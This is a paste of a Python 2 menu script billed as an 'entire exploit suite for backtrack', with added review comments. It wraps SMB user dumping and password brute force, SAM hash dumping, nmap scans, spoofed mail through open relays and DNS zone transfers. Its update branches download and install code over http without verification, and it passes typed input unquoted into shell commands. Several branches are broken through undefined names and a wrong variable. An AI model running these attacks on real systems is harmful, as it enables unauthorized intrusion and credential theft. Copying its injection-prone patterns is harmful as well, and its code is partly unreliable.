Paste Description for ReL1K's Suite
entire exploit suite for backtrack
- ReL1K's Suite
- Monday, April 23rd, 2007 at 9:28:01am MDT
#! /usr/bin/python
# Back|Track V2.0 Attack Module
# Created by: ReL1K
#
# Remember to chmod 755 btupdate.py
#
# Overview: an interactive, menu-driven Python 2 script (print statements,
# raw_input). Each menu choice either shells out through os.system() or uses
# smtplib / dnspython directly, then prints the status value that came back.
#
# NOTE(review): the page shows this script with its indentation stripped; the
# nesting below is reconstructed from the menu logic and should be confirmed
# against the original file.
# NOTE(review): recurring issues, marked again where they occur:
#   * values typed at the prompts are formatted straight into shell command
#     strings and file names passed to os.system();
#   * source code is fetched over plain http:// and then compiled/installed
#     with no checksum or signature verification;
#   * several branches reference names that are never defined in this listing.
import os
import smtplib
import time
import dns.zone
import dns.query
import dns.resolver
import sys
# Wildcard imports: nothing in the visible code refers to a name from these
# two modules explicitly.
from dns.rdatatype import *
from dns.rdataclass import *
from dns.exception import DNSException
print """
Back|Track v2.0 Final Toolset
Written by: ReL1K
"""
# Main Menu to choose
# NOTE(review): options 4 (Wireless Assessment) and 5 (Fuzzers) are offered
# here, but no handler for either appears in this listing.
while 1==1 :
    mainmenu=raw_input("""Back|Track Main Menu:
1. Back|Track Updates
2. External Attack and Penetration
3. Internal Attack and Penetration
4. Wireless Assessment
5. Fuzzers
6. Exit
Enter the number: """)
    # End Main Menu
    # End loop with option 6
    if mainmenu == ('6'):
        print """
**** QUITTING ****
"""
        break
    # End loop
    # Start BackTrack Updates
    if mainmenu == ('1'):
        # Sub-menu loop: stays here until option 7 is chosen.
        while 1==1 :
            blah=raw_input("""Enter a number to update
1. Metasploit 2
2. Metasploit 3
3. Aircrack-NG
4. Kismet
5. Milw0rm
6. Install Aircrack-PTW
7. Return to Main Menu
Enter number: """)
            if blah == '1':
                print """
**** Updating Metasploit v2 ****
"""
                # Updates an existing working copy; the printed value is
                # whatever os.system() returned for the command.
                a=os.system("svn update /pentest/exploits/framework2/")
                print a
            if blah == '2':
                print """
**** Updating Metasploit v3 ****
"""
                b=os.system("svn update /pentest/exploits/framework3/")
                print b
            if blah == '3':
                print """
**** Updating AirCrack-NG ****
"""
                # NOTE(review): checks out trunk over unencrypted http:// and
                # goes straight to `make install`. Nothing verifies what was
                # fetched, so anyone able to alter the traffic or the
                # repository gets code built and installed with the
                # privileges of this process (presumably root, given the
                # install step - confirm). Pinning a reviewed revision and
                # fetching over an authenticated channel would close that gap.
                c=os.system("svn co http://trac.aircrack-ng.org/svn/trunk/ /pentest/wireless/aircrack-ng;cd /pentest/wireless/aircrack-ng;make clean && make && make install")
                print c
            if blah == '4':
                print """
**** Updating Kismet ****
"""
                # NOTE(review): same pattern as the Aircrack-NG branch -
                # unverified http:// checkout followed by ./configure and
                # `make install`.
                d=os.system("svn co http://svn.kismetwireless.net/code/trunk /pentest/wireless/kismet;cd /pentest/wireless/kismet;./configure && make clean && make && make install")
                print d
            if blah == '5':
                print """
**** Updating Milw0rm ****
"""
                # NOTE(review): the archive is downloaded over http://,
                # unpacked, and a script from inside it (./makeindex-milw0rm)
                # is executed without any integrity check.
                # NOTE(review): the command string ends in a dangling `&&`,
                # which is not a complete shell command - TODO confirm how the
                # shell treats the earlier steps in that case.
                e=os.system("cd /pentest/exploits;wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2;tar jxpf milw0rm.tar.bz2;rm milw0rm.tar.bz2;cd milw0rm;./makeindex-milw0rm &&")
                print e
            if blah == '6':
                print """
**** Adding AirCrack-PTW to Back|Track ****
"""
                # NOTE(review): tarball fetched over http://, compiled with
                # gcc and the resulting binary copied into /usr/local/bin,
                # again with no checksum or signature verification. The steps
                # are joined with `;`, so a failed download or compile does
                # not stop the later cp/chmod from running.
                f=os.system("cd /pentest/wireless;wget http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-1.0.0.tar.gz;tar -zxvf aircrack-ptw-1.0.0.tar.gz;cd aircrack-ptw-1.0.0;gcc -o aircrack-ptw -Wall -fomit-frame-pointer -O3 -lpcap aircrack-ptw.c aircrack-ptw-lib.c -lpcap ;cp aircrack-ptw /usr/local/bin;rm /pentest/wireless/aircrack-ptw-1.0.0.tar.gz;chmod 755 /usr/local/bin/aircrack-ptw")
                print f
            if blah == '7':
                print """
**** Exiting Menu ****
"""
                break
    # End Back|Track Updates
    # Start External Attack and Penetration
    if mainmenu == '2':
        # NOTE(review): options 1, 2, 5 and 6 of this menu have no handler in
        # the listing; choosing them just redisplays the menu.
        while 1==1:
            menu = raw_input("""Lets do this:
1. Enumeration
2. Port Scanning
3. Mail Relay
4. Zone Transfer
5. Exploitation
6. SQL Injection spawn XP_Cmdshell
7. Return to Previous Menu
Enter a number: """)
            if menu == '3' :
                # Mail Relay Written by ReL1K
                # Builds a message from the operator's From/To/Subject/body
                # values plus the current local time and submits it,
                # unauthenticated, to the named SMTP server.
                # NOTE(review): a server that accepts this for a recipient
                # outside its own domains is behaving as an open relay; the
                # corresponding hardening is relay restriction on the MTA.
                ab1 = raw_input ("Enter From: ")
                ab2 = raw_input ("Enter To: ")
                ab5 = time.ctime(time.time())
                ab3 = raw_input ("Enter Subject: ")
                ab4 = raw_input ("Enter Message: ")
                ab6 = ('From: %s\nTo: %s\nDate: %s\nSubject: %s\n%s\n' % (ab1,ab2,ab5,ab3,ab4))
                server= raw_input("Enter servername: ")
                print "Sending the mail now..."
                mailsend= smtplib.SMTP('%s' % (server))
                # smtplib's sendmail() returns a dict of refused recipients,
                # so a non-empty value means at least one was rejected.
                code = mailsend.sendmail(ab1, ab2, ab6)
                # NOTE(review): `s` is never defined in this listing (the
                # connection object is `mailsend`), so this line raises
                # NameError before the result check below is reached.
                s.quit()
                if code:
                    print "Didn't send successfully"
                else:
                    print "It worked!"
            # End Mail Relay
            # Starting Zone Transfer
            # By ReL1K
            if menu == '4':
                # Looks up the NS records for the entered domain and prints
                # each name server found.
                # NOTE(review): as written this branch cannot complete:
                # `ns.append` is referenced but never called, so `ns` stays
                # empty; `zone` and `logfile` are not defined anywhere in the
                # listing; 'name, record' is a literal string; and
                # `e.___class___` has three underscores on each side.
                # NOTE(review): on the defensive side, authoritative servers
                # should answer AXFR only for their authorised secondaries
                # (address ACLs and/or TSIG).
                domain = raw_input ("Enter domain name: ")
                print ("Looking up NS for domain %s" % (domain))
                resolve = dns.resolver.query(domain, 'NS')
                ns= []
                for rdata in resolve:
                    n = str(rdata)
                    print "Name server found:", n
                    ns.append
                for n in ns:
                    print "Attempting a zone transfer..."
                    try:
                        zonetransfer = dns.zone.from_xfr(dns.query.xfr(n, domain))
                        print "\nPrinting results..."
                        for name, node in zone.nodes.items():
                            rdataset = node.rdatasets
                            for record in rdataset:
                                print >> logfile, 'name, record'
                    except DNSException, e:
                        print e.___class___, e
            #End Zone Transfer
            # start option 7 menu
            if menu == '7' :
                print """
***** Returning to Previous Menu *****
"""
                break
            # End option 7 exit
    # Start Internal Attack and Penetration Option 3
    if mainmenu == '3' :
        # NOTE(review): option 2 of this menu has no handler in the listing.
        # Every branch below writes into /root/internalap, which only
        # option 5 creates.
        while 1==1:
            intmenu=raw_input("""What doya wanta do:
1. Null Session User Dump and Brute Force (lowercase, upper, and blank)
2. Blank SQL Ping and Auto Spawn XP_Cmdshell
3. Port Scanning
4. Dump SAM
5. Prep your box for this menu
6. Go Back a previous menu
Enter a number: """)
            # Start Option 1 SMB Brute Force
            if intmenu == '1':
                # NOTE(review): `input1` is formatted unquoted into the shell
                # command and into output file names. Shell metacharacters in
                # the value are interpreted by the shell, and path characters
                # can redirect the output file. Validating the value as an IP
                # address and passing an argument list instead of a shell
                # string would remove both problems.
                input1=raw_input("Enter the IP address: ")
                smb=os.system("/pentest/enumeration/smb-enum/smbdumpusers -i %s -v -r /root/internalap/%sdumpusers.txt" % (input1,input1))
                print smb
                # Reads smbpasslist.txt (written by option 5) and the user
                # list produced by the previous command.
                smbbf=os.system("/pentest/enumeration/smb-enum/smbbf -i %s -p /root/internalap/smbpasslist.txt -u /root/internalap/%sdumpusers.txt -r /root/internalap/%ssmbsuccess.txt -v" % (input1,input1,input1))
                print smbbf
                # NOTE(review): the message below omits the IP prefix; the
                # command above writes to /root/internalap/<ip>smbsuccess.txt.
                print """
When completed, your results will be in /root/internalap/smbsuccess.txt
"""
            # Option 1 SMB Brute Force END
            # Option 3 Port Scanning
            if intmenu == '3':
                portmenu=raw_input("""What type of scan:
1. Stealth SYN
2. Stealth TCP
Choose a number: """)
                # Chose 1 Syn Scan
                if portmenu == '1':
                    # NOTE(review): same unquoted interpolation of operator
                    # input into a shell command and a redirect target.
                    synip=raw_input("Enter the IP: ")
                    syn=os.system("nmap -sS -O -v -P0 %s > /root/internalap/%sportscan.txt" % (synip,synip))
                    print syn
                    # NOTE(review): the message names /pentest/internalap,
                    # but the redirect above writes under /root/internalap.
                    print "*** Results will be printed in /pentest/internalap under <ip>portscan.txt ***"
                # Chose 2 TCP Scan
                if portmenu == '2':
                    tcpip=raw_input("Enter the IP: ")
                    # NOTE(review): the command uses `synip`, not the `tcpip`
                    # value just entered. If the SYN option has not been run
                    # in this session this raises NameError; otherwise the
                    # scan silently goes to the previously entered address
                    # instead of the one the operator intended.
                    tcp=os.system("nmap -sT -O -v -P0 %s > /root/internalap/%sportscan.txt" % (synip,synip))
                    print tcp
                    print "*** Results will be printed in /root/internalap under <ip>portscan.txt ***"
            # End Port Scan
            # Start SAM DUMP
            if intmenu == '4':
                # NOTE(review): both prompts feed the shell command
                # unquoted. The output file <ip>samdump.txt presumably holds
                # account password hashes (inferred from the tool name -
                # confirm) and is left in /root/internalap until option 5
                # deletes the directory.
                ipdump=raw_input("Enter the IP of server: ")
                ipuser=raw_input("Enter the Username (example domain\user): ")
                sam=os.system("/pentest/windows-binaries/passwd-attack/wine PWDump4.exe %s /u: %s /o: /root/internalap/%ssamdump.txt" % (ipdump,ipuser,ipdump))
                print sam
            # End SAM DUMP
            # Option 5 Start PREP
            if intmenu == '5':
                print """
****** Prepping your Box ******
"""
                # NOTE(review): removes /root/internalap and everything in
                # it, including results from earlier runs, without
                # confirmation, then recreates the directory and writes the
                # password-list file that option 1 reads.
                c=os.system("rm -rf /root/internalap")
                a=os.system("mkdir /root/internalap")
                b=os.system('echo -e "\nlc %username%\nuc %username%" > /root/internalap/smbpasslist.txt')
                # Status values are printed in the order rm, mkdir, echo.
                print c
                print a
                print b
                print """
****** Your results will be piped to /root/internalap ******
"""
            # Option 5 Prep END
            # Option 6 Previous Menu
            if intmenu == '6':
                print """
****** Returning to previous menu ******
"""
                break
            # End Option 6 Previous Menu
    # Starting Main Menu 5 Fuzzers
    # NOTE(review): the listing ends here; no code for the Fuzzers or Wireless
    # Assessment options is shown on the page.